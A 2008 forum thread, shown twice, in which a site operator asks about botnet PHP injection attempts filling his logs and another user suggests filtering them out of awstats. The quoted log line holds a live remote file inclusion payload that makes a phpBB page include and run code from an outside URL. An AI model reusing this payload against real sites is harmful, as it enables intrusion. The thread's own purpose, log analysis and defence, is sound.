php attacks in logs

**confusion** · 04-28-2008, 09:59 PM

For months now, I have been seeing attacks that are trying to inject php from other sites through the URL that is passed. Here is an example log:

Code:

syslog.org:80.219.159.57 - - [28/Apr/2008:21:48:14 -0400] "GET /forum/index.php?topic=82.0//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????

I get tens of thousands of these per day across many sites. They come from hundreds of different IP's, with each IP only used a few times. Clearly, the source of the requests is a botnet, and they are essentially "fuzz testing" the sites.

The most pragmatic issue I have with this is that I believe it junks up the stats in tools like awstats. Are other people seeing this, and how are you handling it?

**crashed** · 05-01-2008, 07:34 PM

In awstats config you can filter it during stats generation to leave out url's with specific strings so set the filter not to include any containing "include($_GET".

I cant remember the option of the top of my head, however its in the docs and I have used it in the past.

04-28-2008, 09:59 PM	#1 (permalink) php attacks in logs
confusion Junior Talker Posts: 3 Talkupation:	For months now, I have been seeing attacks that are trying to inject php from other sites through the URL that is passed. Here is an example log: Code: syslog.org:80.219.159.57 - - [28/Apr/2008:21:48:14 -0400] "GET /forum/index.php?topic=82.0//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? I get tens of thousands of these per day across many sites. They come from hundreds of different IP's, with each IP only used a few times. Clearly, the source of the requests is a botnet, and they are essentially "fuzz testing" the sites. The most pragmatic issue I have with this is that I believe it junks up the stats in tools like awstats. Are other people seeing this, and how are you handling it? __________________ Syslog \| Tropical Fish \| Article Submission \| Enterprise IT

05-01-2008, 07:34 PM	#2 (permalink) Re: php attacks in logs
crashed Average Talker Posts: 15 Name: Chris Location: UK Talkupation:	In awstats config you can filter it during stats generation to leave out url's with specific strings so set the filter not to include any containing "include($_GET". I cant remember the option of the top of my head, however its in the docs and I have used it in the past. __________________ Chris .Net C# ASP.NET Developer Windows Systems Administrator